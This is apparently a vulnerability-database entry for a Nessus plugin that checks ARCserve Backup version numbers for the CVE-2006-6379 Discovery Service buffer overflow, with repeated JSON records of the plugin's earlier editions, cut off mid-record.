CA BrightStor ARCserve Backup Discovery Service Overflow
2006-12-12T00:00:00
ID ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL Type nessus Reporter Tenable Modified 2018-11-15T00:00:00
Description
According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service.
Note that the vendor reports only Windows installs are vulnerable.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(23841);
script_version("1.15");
script_cvs_date("Date: 2018/11/15 20:50:26");
script_cve_id("CVE-2006-6379");
script_bugtraq_id(21502);
script_name(english:"CA BrightStor ARCserve Backup Discovery Service Overflow");
script_summary(english:"Checks version of BrightStor ARCserve Backup");
script_set_attribute(attribute:"synopsis", value:
"The remote service is affected by a buffer overflow vulnerability.");
script_set_attribute(attribute:"description", value:
"According to its version, the installation of BrightStor ARCserve
Backup on the remote host allows an attacker to execute arbitrary code
on the affected host with SYSTEM privileges due to a buffer overflow
that can be triggered by a specially crafted packet sent to the
Discovery Service.
Note that the vendor reports only Windows installs are vulnerable.");
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?34d9360c");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded");
script_set_attribute(attribute:"solution", value:
"Either apply the appropriate patch as described in the vendor advisory
referenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or
later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/12/12");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/12/08");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ca:arcserve_backup");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
script_dependencies("arcserve_discovery_service_detect.nasl", "os_fingerprint.nasl");
script_require_keys("ARCSERVE/Discovery/Version");
exit(0);
}
os = get_kb_item("Host/OS");
if (!os || "Windows" >!< os) exit(0);
ver = get_kb_item("ARCSERVE/Discovery/Version");
if (isnull(ver)) exit(0);
port = get_kb_item("Services/udp/casdscsvc");
if (!port) exit(0);
matches = eregmatch(string:ver, pattern:"^[a-z]([0-9]+\.[0-9]+) \(build ([0-9]+)\)$");
if (!isnull(matches))
{
ver = matches[1];
build = int(matches[2]);
if (
(ver == "11.5" && build < 4232) ||
(ver == "11.1" && build < 3205) ||
# nb: QI82917 says there's no patch for 11.0; the solution is to
# upgrade to 11.1 and then apply QO82863.
(ver == "11.0") ||
# nb: QO84611 doesn't exist.
(ver == "10.5") ||
(ver == "9.0" && build < 2203)
) security_hole(port:port, proto:"udp");
}
{"id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "bulletinFamily": "scanner", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "published": "2006-12-12T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "reporter": "Tenable", "references": ["https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded", "http://www.nessus.org/u?34d9360c"], "cvelist": ["CVE-2006-6379"], "type": "nessus", "lastseen": "2019-02-21T01:09:38", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a2adbdfec3a472194c7b9bd7400a81343340e771ca76af7646f1b615d3c54ce2", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "6bdce82dcc94ff26304f84c904af1ec5", "key": "sourceData"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-06-29T05:35:41", "modified": "2018-06-27T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-06-29T05:35:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "beaea84aae3b3cba52a74f8ef3477d7831dd7c433376f54326b2d2d276969bce", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "6bdce82dcc94ff26304f84c904af1ec5", "key": "sourceData"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-08-30T19:34:34", "modified": "2018-06-27T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:34:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a2adbdfec3a472194c7b9bd7400a81343340e771ca76af7646f1b615d3c54ce2", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "6bdce82dcc94ff26304f84c904af1ec5", "key": "sourceData"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-09-01T23:38:22", "modified": "2018-06-27T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:38:22"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "97803c325b0889b49fa0bfaf9be3d4e04dfb6444f526c6b724cd778779ddab1c", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "3df95bb580deecca3f439f8e778654f1", "key": "sourceData"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "edd4a2e72a7e4c07d2c8b0ad00509f59", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-11-16T16:53:47", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded", "http://www.nessus.org/u?34d9360c"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-16T16:53:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e1de81fc05a619ba5a232d6fe5a0d766d023ad18f82759dafd44004d7d229fd9", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "253070b2147836c5b000d6f0e62c8663", "key": "modified"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "7f3490b6cc1073c858e0dedd24527124", "key": "sourceData"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2017-10-29T13:35:29", "modified": "2011-10-21T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2011/10/21 01:22:51 $\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n script_osvdb_id(30775);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 